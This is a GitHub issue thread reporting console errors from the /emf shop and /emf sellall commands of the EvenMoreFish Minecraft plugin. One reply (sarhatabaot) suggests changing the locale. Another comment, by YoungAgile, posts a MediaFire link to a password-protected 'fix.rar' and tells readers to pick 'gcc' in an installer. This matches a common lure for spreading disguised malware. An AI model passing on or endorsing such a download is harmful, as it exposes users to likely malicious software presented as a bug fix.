### ISSUE TITLE
[Bug]: Doesn't work /emf shop or /emf sellall

### ISSUE THREAD

**Issue by mcwal18** [Oheers/EvenMoreFish#419]
### Contact Details

Discord: therawr_

### What happened?

When you try to put /emf shop or /emf sellall, it doesn't work and it gives you a console error.
/emf sellall >>> https://pastebin.com/3rr2Tskq
/emf shop >>> https://pastebin.com/aKs6Tjga

### Version

Development

### Development Version

even-more-fish-1.7.3-106

### Server Version

Paper 1.20.1

### Java Version

17

### Relevant screenshots

![image](https://github.com/user-attachments/assets/e2145200-86c4-4810-bb08-50078a53ff3d)

**Comment by YoungAgile** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by sarhatabaot** [comment]
Change your locale to en_US
